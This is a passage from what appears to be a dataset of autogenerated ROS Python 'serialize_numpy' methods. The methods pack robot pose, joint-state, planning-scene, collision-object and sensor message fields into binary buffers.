_x.x.pose.position.y, _x.x.pose.position.z, _x.x.pose.orientation.x, _x.x.pose.orientation.y, _x.x.pose.orientation.z, _x.x.pose.orientation.w, _x.x_desi.header.seq, _x.x_desi.header.stamp.secs, _x.x_desi.header.stamp.nsecs))\n _x = self.x_desi.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_7d3I().pack(_x.x_desi.pose.position.x, _x.x_desi.pose.position.y, _x.x_desi.pose.position.z, _x.x_desi.pose.orientation.x, _x.x_desi.pose.orientation.y, _x.x_desi.pose.orientation.z, _x.x_desi.pose.orientation.w, _x.x_desi_filtered.header.seq, _x.x_desi_filtered.header.stamp.secs, _x.x_desi_filtered.header.stamp.nsecs))\n _x = self.x_desi_filtered.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_31d().pack(_x.x_desi_filtered.pose.position.x, _x.x_desi_filtered.pose.position.y, _x.x_desi_filtered.pose.position.z, _x.x_desi_filtered.pose.orientation.x, _x.x_desi_filtered.pose.orientation.y, _x.x_desi_filtered.pose.orientation.z, _x.x_desi_filtered.pose.orientation.w, _x.x_err.linear.x, _x.x_err.linear.y, _x.x_err.linear.z, _x.x_err.angular.x, _x.x_err.angular.y, _x.x_err.angular.z, _x.xd.linear.x, _x.xd.linear.y, _x.xd.linear.z, _x.xd.angular.x, _x.xd.angular.y, _x.xd.angular.z, _x.xd_desi.linear.x, _x.xd_desi.linear.y, _x.xd_desi.linear.z, _x.xd_desi.angular.x, _x.xd_desi.angular.y, _x.xd_desi.angular.z, _x.F.force.x, _x.F.force.y, _x.F.force.z, _x.F.torque.x, _x.F.torque.y, _x.F.torque.z))\n length = len(self.tau_pose)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.tau_pose.tostring())\n length = len(self.tau_posture)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.tau_posture.tostring())\n length = len(self.tau)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.tau.tostring())\n length = len(self.J.layout.dim)\n buff.write(_struct_I.pack(length))\n for val1 in self.J.layout.dim:\n _x = val1.label\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1\n buff.write(_get_struct_2I().pack(_x.size, _x.stride))\n buff.write(_get_struct_I().pack(self.J.layout.data_offset))\n length = len(self.J.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.J.data.tostring())\n length = len(self.N.layout.dim)\n buff.write(_struct_I.pack(length))\n for val1 in self.N.layout.dim:\n _x = val1.label\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1\n buff.write(_get_struct_2I().pack(_x.size, _x.stride))\n buff.write(_get_struct_I().pack(self.N.layout.data_offset))\n length = len(self.N.data)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.N.data.tostring())\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self.object1\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.object2\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_di.pack(_x.penetration_distance, _x.operation))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.planning_scene_diff.robot_state.joint_state.header.seq, _x.planning_scene_diff.robot_state.joint_state.header.stamp.secs, _x.planning_scene_diff.robot_state.joint_state.header.stamp.nsecs))\n _x = self.planning_scene_diff.robot_state.joint_state.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.planning_scene_diff.robot_state.joint_state.name)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.robot_state.joint_state.name:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene_diff.robot_state.joint_state.position)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.planning_scene_diff.robot_state.joint_state.position.tostring())\n length = len(self.planning_scene_diff.robot_state.joint_state.velocity)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.planning_scene_diff.robot_state.joint_state.velocity.tostring())\n length = len(self.planning_scene_diff.robot_state.joint_state.effort)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.planning_scene_diff.robot_state.joint_state.effort.tostring())\n _x = self\n buff.write(_struct_2I.pack(_x.planning_scene_diff.robot_state.multi_dof_joint_state.stamp.secs, _x.planning_scene_diff.robot_state.multi_dof_joint_state.stamp.nsecs))\n length = len(self.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene_diff.robot_state.multi_dof_joint_state.frame_ids)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.robot_state.multi_dof_joint_state.frame_ids:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene_diff.robot_state.multi_dof_joint_state.child_frame_ids)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.robot_state.multi_dof_joint_state.child_frame_ids:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene_diff.robot_state.multi_dof_joint_state.poses)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.robot_state.multi_dof_joint_state.poses:\n _v57 = val1.position\n _x = _v57\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v58 = val1.orientation\n _x = _v58\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.planning_scene_diff.fixed_frame_transforms)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.fixed_frame_transforms:\n _v59 = val1.header\n buff.write(_struct_I.pack(_v59.seq))\n _v60 = _v59.stamp\n _x = _v60\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v59.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.child_frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v61 = val1.transform\n _v62 = _v61.translation\n _x = _v62\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v63 = _v61.rotation\n _x = _v63\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.planning_scene_diff.allowed_collision_matrix.link_names)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.allowed_collision_matrix.link_names:\n length = len(val1)\n if python3 or type(val1) == unicode:\n val1 = val1.encode('utf-8')\n length = len(val1)\n buff.write(struct.pack('<I%ss'%length, length, val1))\n length = len(self.planning_scene_diff.allowed_collision_matrix.entries)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.allowed_collision_matrix.entries:\n length = len(val1.enabled)\n buff.write(_struct_I.pack(length))\n pattern = '<%sB'%length\n buff.write(val1.enabled.tostring())\n length = len(self.planning_scene_diff.allowed_contacts)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.allowed_contacts:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v64 = val1.shape\n buff.write(_struct_b.pack(_v64.type))\n length = len(_v64.dimensions)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(_v64.dimensions.tostring())\n length = len(_v64.triangles)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(_v64.triangles.tostring())\n length = len(_v64.vertices)\n buff.write(_struct_I.pack(length))\n for val3 in _v64.vertices:\n _x = val3\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v65 = val1.pose_stamped\n _v66 = _v65.header\n buff.write(_struct_I.pack(_v66.seq))\n _v67 = _v66.stamp\n _x = _v67\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v66.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v68 = _v65.pose\n _v69 = _v68.position\n _x = _v69\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v70 = _v68.orientation\n _x = _v70\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(val1.link_names)\n buff.write(_struct_I.pack(length))\n for val2 in val1.link_names:\n length = len(val2)\n if python3 or type(val2) == unicode:\n val2 = val2.encode('utf-8')\n length = len(val2)\n buff.write(struct.pack('<I%ss'%length, length, val2))\n buff.write(_struct_d.pack(val1.penetration_depth))\n length = len(self.planning_scene_diff.link_padding)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.link_padding:\n _x = val1.link_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_d.pack(val1.padding))\n length = len(self.planning_scene_diff.collision_objects)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.collision_objects:\n _v71 = val1.header\n buff.write(_struct_I.pack(_v71.seq))\n _v72 = _v71.stamp\n _x = _v72\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v71.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_f.pack(val1.padding))\n _v73 = val1.operation\n buff.write(_struct_b.pack(_v73.operation))\n length = len(val1.shapes)\n buff.write(_struct_I.pack(length))\n for val2 in val1.shapes:\n buff.write(_struct_b.pack(val2.type))\n length = len(val2.dimensions)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(val2.dimensions.tostring())\n length = len(val2.triangles)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(val2.triangles.tostring())\n length = len(val2.vertices)\n buff.write(_struct_I.pack(length))\n for val3 in val2.vertices:\n _x = val3\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n length = len(val1.poses)\n buff.write(_struct_I.pack(length))\n for val2 in val1.poses:\n _v74 = val2.position\n _x = _v74\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v75 = val2.orientation\n _x = _v75\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.planning_scene_diff.attached_collision_objects)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.attached_collision_objects:\n _x = val1.link_name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _v76 = val1.object\n _v77 = _v76.header\n buff.write(_struct_I.pack(_v77.seq))\n _v78 = _v77.stamp\n _x = _v78\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v77.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = _v76.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_f.pack(_v76.padding))\n _v79 = _v76.operation\n buff.write(_struct_b.pack(_v79.operation))\n length = len(_v76.shapes)\n buff.write(_struct_I.pack(length))\n for val3 in _v76.shapes:\n buff.write(_struct_b.pack(val3.type))\n length = len(val3.dimensions)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(val3.dimensions.tostring())\n length = len(val3.triangles)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(val3.triangles.tostring())\n length = len(val3.vertices)\n buff.write(_struct_I.pack(length))\n for val4 in val3.vertices:\n _x = val4\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n length = len(_v76.poses)\n buff.write(_struct_I.pack(length))\n for val3 in _v76.poses:\n _v80 = val3.position\n _x = _v80\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v81 = val3.orientation\n _x = _v81\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(val1.touch_links)\n buff.write(_struct_I.pack(length))\n for val2 in val1.touch_links:\n length = len(val2)\n if python3 or type(val2) == unicode:\n val2 = val2.encode('utf-8')\n length = len(val2)\n buff.write(struct.pack('<I%ss'%length, length, val2))\n _x = self\n buff.write(_struct_3I.pack(_x.planning_scene_diff.collision_map.header.seq, _x.planning_scene_diff.collision_map.header.stamp.secs, _x.planning_scene_diff.collision_map.header.stamp.nsecs))\n _x = self.planning_scene_diff.collision_map.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.planning_scene_diff.collision_map.boxes)\n buff.write(_struct_I.pack(length))\n for val1 in self.planning_scene_diff.collision_map.boxes:\n _v82 = val1.center\n _x = _v82\n buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))\n _v83 = val1.extents\n _x = _v83\n buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))\n _v84 = val1.axis\n _x = _v84\n buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))\n buff.write(_struct_f.pack(val1.angle))\n length = len(self.operations.collision_operations)\n buff.write(_struct_I.pack(length))\n for val1 in self.operations.collision_operations:\n _x = val1.object1\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.object2\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1\n buff.write(_struct_di.pack(_x.penetration_distance, _x.operation))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_51B.pack(_x.temp_1_curr, _x.temp_1_min, _x.temp_1_max, _x.temp_2_curr, _x.temp_2_min, _x.temp_2_max, _x.temp_3_curr, _x.temp_3_min, _x.temp_3_max, _x.temp_4_curr, _x.temp_4_min, _x.temp_4_max, _x.temp_5_curr, _x.temp_5_min, _x.temp_5_max, _x.temp_6_curr, _x.temp_6_min, _x.temp_6_max, _x.akku_voltage_curr, _x.akku_voltage_min, _x.akku_voltage_max, _x.hals_motor_voltage_curr, _x.hals_motor_voltage_min, _x.hals_motor_voltage_max, _x.hals_logik_voltage_curr, _x.hals_logik_voltage_min, _x.hals_logik_voltage_max, _x.tablett_logik_voltage_curr, _x.tablett_logik_voltage_min, _x.tablett_logik_voltage_max, _x.arm_logik_voltage_curr, _x.arm_logik_voltage_min, _x.arm_logik_voltage_max, _x.tablett_motor_voltage_curr, _x.tablett_motor_voltage_min, _x.tablett_motor_voltage_max, _x.hals_motor_current_curr, _x.hals_motor_current_min, _x.hals_motor_current_max, _x.hals_logik_current_curr, _x.hals_logik_current_min, _x.hals_logik_current_max, _x.tablett_logik_current_curr, _x.tablett_logik_current_min, _x.tablett_logik_current_max, _x.arm_logik_current_curr, _x.arm_logik_current_min, _x.arm_logik_current_max, _x.tablett_motor_current_curr, _x.tablett_motor_current_min, _x.tablett_motor_current_max))\n except struct.error, se: self._check_types(se)\n except TypeError, te: self._check_types(te)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self.sim_step\n buff.write(_get_struct_I().pack(_x))\n _x = self.type.data\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self.parent_name.data\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self.name.data\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_2f7dI().pack(_x.wall_time, _x.sim_time, _x.pose.position.x, _x.pose.position.y, _x.pose.position.z, _x.pose.orientation.x, _x.pose.orientation.y, _x.pose.orientation.z, _x.pose.orientation.w, _x.count))\n length = len(self.triggered)\n buff.write(_struct_I.pack(length))\n pattern = '<%sB'%length\n buff.write(self.triggered.tostring())\n length = len(self.range)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(self.range.tostring())\n length = len(self.measurement)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(self.measurement.tostring())\n length = len(self.sensed_objects)\n buff.write(_struct_I.pack(length))\n for val1 in self.sensed_objects:\n _x = val1.data\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self.sensed_objects_map\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.Struct('<I%sB'%length).pack(length, *_x))\n else:\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n buff.write(_struct_f.pack(self.yaw))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.model.header.seq, _x.model.header.stamp.secs, _x.model.header.stamp.nsecs))\n _x = self.model.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_i.pack(self.model.id))\n _x = self.model.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.model.params)\n buff.write(_struct_I.pack(length))\n for val1 in self.model.params:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1\n buff.write(_struct_dB.pack(_x.value, _x.type))\n _x = self\n buff.write(_struct_3I.pack(_x.model.track.header.seq, _x.model.track.header.stamp.secs, _x.model.track.header.stamp.nsecs))\n _x = self.model.track.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_i.pack(self.model.track.id))\n length = len(self.model.track.pose)\n buff.write(_struct_I.pack(length))\n for val1 in self.model.track.pose:\n _v29 = val1.position\n _x = _v29\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v30 = val1.orientation\n _x = _v30\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.model.track.pose_headers)\n buff.write(_struct_I.pack(length))\n for val1 in self.model.track.pose_headers:\n buff.write(_struct_I.pack(val1.seq))\n _v31 = val1.stamp\n _x = _v31\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = val1.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.model.track.pose_projected)\n buff.write(_struct_I.pack(length))\n for val1 in self.model.track.pose_projected:\n _v32 = val1.position\n _x = _v32\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v33 = val1.orientation\n _x = _v33\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.model.track.pose_resampled)\n buff.write(_struct_I.pack(length))\n for val1 in self.model.track.pose_resampled:\n _v34 = val1.position\n _x = _v34\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v35 = val1.orientation\n _x = _v35\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.model.track.pose_flags)\n buff.write(_struct_I.pack(length))\n pattern = '<%sI'%length\n buff.write(self.model.track.pose_flags.tostring())\n length = len(self.model.track.channels)\n buff.write(_struct_I.pack(length))\n for val1 in self.model.track.channels:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val1.values)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(val1.values.tostring())\n _x = self\n buff.write(_struct_3I.pack(_x.data.header.seq, _x.data.header.stamp.secs, _x.data.header.stamp.nsecs))\n _x = self.data.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_i.pack(self.data.id))\n _x = self.data.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.data.params)\n buff.write(_struct_I.pack(length))\n for val1 in self.data.params:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1\n buff.write(_struct_dB.pack(_x.value, _x.type))\n _x = self\n buff.write(_struct_3I.pack(_x.data.track.header.seq, _x.data.track.header.stamp.secs, _x.data.track.header.stamp.nsecs))\n _x = self.data.track.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_i.pack(self.data.track.id))\n length = len(self.data.track.pose)\n buff.write(_struct_I.pack(length))\n for val1 in self.data.track.pose:\n _v36 = val1.position\n _x = _v36\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v37 = val1.orientation\n _x = _v37\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.data.track.pose_headers)\n buff.write(_struct_I.pack(length))\n for val1 in self.data.track.pose_headers:\n buff.write(_struct_I.pack(val1.seq))\n _v38 = val1.stamp\n _x = _v38\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = val1.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.data.track.pose_projected)\n buff.write(_struct_I.pack(length))\n for val1 in self.data.track.pose_projected:\n _v39 = val1.position\n _x = _v39\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v40 = val1.orientation\n _x = _v40\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.data.track.pose_resampled)\n buff.write(_struct_I.pack(length))\n for val1 in self.data.track.pose_resampled:\n _v41 = val1.position\n _x = _v41\n buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))\n _v42 = val1.orientation\n _x = _v42\n buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))\n length = len(self.data.track.pose_flags)\n buff.write(_struct_I.pack(length))\n pattern = '<%sI'%length\n buff.write(self.data.track.pose_flags.tostring())\n length = len(self.data.track.channels)\n buff.write(_struct_I.pack(length))\n for val1 in self.data.track.channels:\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val1.values)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(val1.values.tostring())\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.sensor_FL.header.seq, _x.sensor_FL.header.stamp.secs, _x.sensor_FL.header.stamp.nsecs))\n _x = self.sensor_FL.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_B4f3I().pack(_x.sensor_FL.radiation_type, _x.sensor_FL.field_of_view, _x.sensor_FL.min_range, _x.sensor_FL.max_range, _x.sensor_FL.range, _x.sensor_FR.header.seq, _x.sensor_FR.header.stamp.secs, _x.sensor_FR.header.stamp.nsecs))\n _x = self.sensor_FR.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_B4f3I().pack(_x.sensor_FR.radiation_type, _x.sensor_FR.field_of_view, _x.sensor_FR.min_range, _x.sensor_FR.max_range, _x.sensor_FR.range, _x.sensor_RR.header.seq, _x.sensor_RR.header.stamp.secs, _x.sensor_RR.header.stamp.nsecs))\n _x = self.sensor_RR.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_B4f3I().pack(_x.sensor_RR.radiation_type, _x.sensor_RR.field_of_view, _x.sensor_RR.min_range, _x.sensor_RR.max_range, _x.sensor_RR.range, _x.sensor_RL.header.seq, _x.sensor_RL.header.stamp.secs, _x.sensor_RL.header.stamp.nsecs))\n _x = self.sensor_RL.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_B4f().pack(_x.sensor_RL.radiation_type, _x.sensor_RL.field_of_view, _x.sensor_RL.min_range, _x.sensor_RL.max_range, _x.sensor_RL.range))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_3I.pack(_x.pan.header.seq, _x.pan.header.stamp.secs, _x.pan.header.stamp.nsecs))\n _x = 